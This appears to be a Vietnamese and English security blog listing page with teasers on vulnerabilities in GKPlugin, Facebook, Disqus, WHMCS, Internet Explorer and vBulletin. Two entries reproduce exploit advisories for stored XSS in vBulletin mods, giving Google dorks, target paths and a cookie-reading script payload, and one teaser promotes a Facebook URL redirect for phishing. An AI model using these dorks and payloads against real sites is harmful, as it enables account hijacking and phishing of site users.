Lỗ hổng trong GKPlugin cho phép Hacker đọc nội dung mã nguồn của website

GKPlugin hay còn có tên Gác Kiếm Player là một plugin hỗ trợ phát video, tệp tin media từ các trang lưu trữ video khác trên trang của bạn. GKPlugins được phát triển trên JWPlayer, cho phép chạy audio, video từ những máy chủ khác bởi đầu vào là một liên kết trực tiếp trên thanh địa chỉ của trình duyệt.

Với khả năng phát tệp tin đa phương tiện từ nhiều nguồn khác nhau và dễ dàng tùy biến như thêm Logo vào trình phát hay thay đổi giao diện cho phù hợp với trang, do đó GKPlugin được yêu thích và sử dụng tại nhiều trang xem phim trực tuyến hiện nay. Và việc nó được phát triển trên nền JWPlayer – là một player được ưa chuộng đã giúp GKPlugin trở nên phổ biến hơn.

Trong quá trình phân tích mã nguồn GKPlugins, K-20 đã phát hiện ra lỗ hổng cho phép tải và đọc nội dung tệp tin mã nguồn bất kì của Website sử dụng plugin này.

READ MORE »

Lỗ hổng trong Facebook SDK khiến hàng triệu tài khoản người dùng gặp nguy hiểm

Các nhà nghiên cứu bảo mật từ MetaIntell và Giám đốc Quản Lý Rủi Ro Điện Thoại  (MRM) vừa mới phát hiện một lỗ hổng bảo mật lớn  trên phiên bản mới nhất của Facebook SDK khiến hàng triệu thẻ xác thực (Token Authentication) của người dùng gặp nguy hiểm.

Facebook SDK dùng trên hệ điều hành Android và iOS là cách dễ nhất để tích hợp các ứng dụng di động với nền tảng Facebook hỗ trợ người dùng truy cập vào Facebook để tương tác với các Facebook API và còn rất nhiều tính năng khác.

READ MORE »

Lỗ hổng trong plugin WordPress Disqus khiến hàng triệu Blog có nguy cơ bị tấn công

Một lỗ hổng thực thi mã từ xa (RCE) đã được phát hiện trong plugin Disqus - là plugin cung cấp dịch vụ bình luận và thảo luận cho nền tảng blog phổ biến Wordpress.

Hiện tại có hơn 70 triệu trang web trên Internet hiện đang chạy WordPress, khoảng 1,3 triệu người sử dụng plugin 'Disqus Comment System', làm cho nó trở thành một trong những plugin phổ biến của Wordpress.

Nhóm nghiên cứu an ninh tại hãng bảo mật Sucuri đã phát hiện một lỗ hổng Thực thi mã từ xa (RCE) nghiêm trọng trong khi đang phân tích một số cú pháp tùy chỉnh JSON của plugin Disqus và thấy rằng các hàm phân tích cú pháp biến có thể cho phép bất cứ ai thực thi các lệnh trên máy chủ sử dụng hàm PHP eval() được xây dựng không an toàn.

READ MORE »

Xuất hiện lỗ hổng bảo mật trong Plugin “All in One SEO Pack” của WordPress

Nhiều lỗ hổng bảo mật nghiêm trọng đã được phát hiện trong Plugin nổi tiếng "All in One SEO Pack" cho WordPress đặt hàng triệu trang Web sử dụng WordPress có nguy cơ bị ảnh hưởng.

WordPress là một mã nguồn mở dễ dàng cài đặt và sử dụng, do đó rất nhiều người ưa thích sử dụng nó. Nhưng nếu bạn hay công ty của bạn đang sử dụng Plugin "All in One SEO Pack" để tối ưu hóa xếp hạng trang Web trên các bộ máy tìm kiếm thì bạn nên cập nhật ngay lập tức phiên bản mới nhất All in One SEO Pack 2.1.6.

READ MORE »

Malaysian Security Researcher Found XSS Vulnerability In Google

How much Google is secure we will tell you today, One Malaysian security researcher named Ahmad Ashraff talk to us and shared tutorial with us that, how he found XSS Vulnerability in Google and Youtube. 

"On 9th January 2014, posted below image on twitter

https://twitter.com/yappare/status/421470672330571777/photo/1

So is this post related to that? Will get to it soon or probably next month.haha..
In this post I'm going to share to you a bug that manage me to be inside  Google Vulnerability Reward Program G+ Community here

READ MORE »

[XSS] VietVBB.vn - Cross Site Scripting Vulnerability

Bug XSS tại mod VbShout của vBulletin. Một trong những mod khá thông dụng. Video khai thác lỗ hổng (PoC) được thực hiện ngay tại website VietVBB.Vn

PoC Video:

Nguồn: DuyK.net

Microsoft finally fixes critical Internet Explorer vulnerability

Microsoft’s risk and impact graph showing an aggregate view of October’s Severity and Exploitability Index.

(Credit: Microsoft) 
 

In its security update for this month, Microsoft has patched a critical Internet Explorer vulnerability that possibly exposed users to malware and hacks for the last three months.

READ MORE »

Web Hosting software WHMCS vulnerable to SQL Injection; emergency security update released

WHMCS, a popular client management, billing and support application for Web hosting providers, released an emergency security update for the 5.2 and 5.1 minor releases, to patch a critical vulnerability that was publicly disclosed.

READ MORE »

[Video] vBulletin Install Auto Exploiter Modified Script

Chào các bạn!

Sau khi đọc thông tin về lỗ hổng bảo mật này tại đây thì mình đã tìm hiểu, đọc mã nguồn vBulletin và viết thử script khai thác. Làm luôn cái video cho các bạn dễ hình dung nhé. Công cụ khai thác sẽ được tích hợp vào Juno_okyo's Blog trong thời gian tới! :)

READ MORE »

Major vBulletin based websites are vulnerable to Hackers

 











vBulletin is a publishing suite that allows users to create and publish a variety of content, including: forums, blogs, and polls. 

If you currently use an older version of  vBulletin  on your website, you might be opening up your site to an attack as some serious security vulnerabilities, which allows hackers to access your hosting admin panel.

Two Indian Hackers, going by virtual name  Ne0-h4ck3r & Google-warri0r has developed an exploit of known  vBulletin  vulnerability, that can be used to add a user remotely to  vBulletin  customer panel with admin privileges. 

READ MORE »

Over 20 security holes found in Windows, IE and other software. Patch now

Microsoft has released its regular “Patch Tuesday” bundle of security patches for Windows and its other software, protecting against a number of critical vulnerabilities.

Some of the security holes are classified as “critical”, meaning that malware or malicious hackers could exploit them to compromise a computer without any interaction by the user.

The most serious fix of the bunch is the MS13-059 cumulative patch for Internet Explorer.

READ MORE »

vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability

##########################################################################################
#
# Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability
# Google Dork: intext:usertag_pro
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
# Version: vBulletin 3.8.x, vBulletin 4.x.x
# Tested on: Linux & Windows
#
##########################################################################################
#
# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions
# (Direct Link:) http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
#
# Stage 2: Add a malicious hash tag.
# (Example:) "><script>alert(document.cookie)</script>
#
##########################################################################################
#
# This was written for educational purpose only. use it at your own risk.
# Author will be not responsible for any damage caused! user assumes all responsibility. 
# Intended for authorized web application pentesting only!
#
##########################################################################################

Folow: http://www.exploit-db.com/

vBulletin vBShout Mod - Stored XSS Vulnerability

##########################################################################################
#
# Exploit Title: vBShout vBulletin - Stored XSS Vulnerability
# Google Dork: intext:vBShout
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?do=product&productid=2
# Version: vBulletin 3.8.x, vBulletin 4.x.x, vBulletin 5.x.x 
# Tested on: Linux & Windows
#
##########################################################################################
#
# Stage 1: Go to -> UserCP -> Custom Commands
# (Direct Link:) http://127.0.0.1/[path]/vbshout.php?do=profile&action=customcommands
#
# Stage 2: Add a malicious hash tag.
# (Example:) "><script>alert(document.cookie)</script>
#
##########################################################################################
#
# This was written for educational purpose only. use it at your own risk.
# Author will be not responsible for any damage caused! user assumes all responsibility. 
# Intended for authorized web application pentesting only!
#
##########################################################################################

Follow: http://www.exploit-db.com/

Facebook URL Redirection Vulnerability 2013

This vulnerability redirects victim by using a Facebook URL to any of the url you want (could be some phishing) ;)

Its absolutely working as i myself tried it just now 3:)

Facebook uses hash to avoid url redirection and hash is per account.

READ MORE »

Critical Facebook vulnerability could have made it easy to hack accounts [VIDEO]

A critical vulnerability was recently found in Facebook that could allow an attacker to hijack, and take control over, accounts on the social network.

No, not the one that required the attacker to just send a single SMS text message. This is a *different* vulnerability that can lead to a complete Facebook account takeover.

This latest security hole was discovered by vulnerability researcher Dan Melamed.
Melamed discovered that a security weakness existed in Facebook’s handling of accounts which have multiple email addresses associated with them.

READ MORE »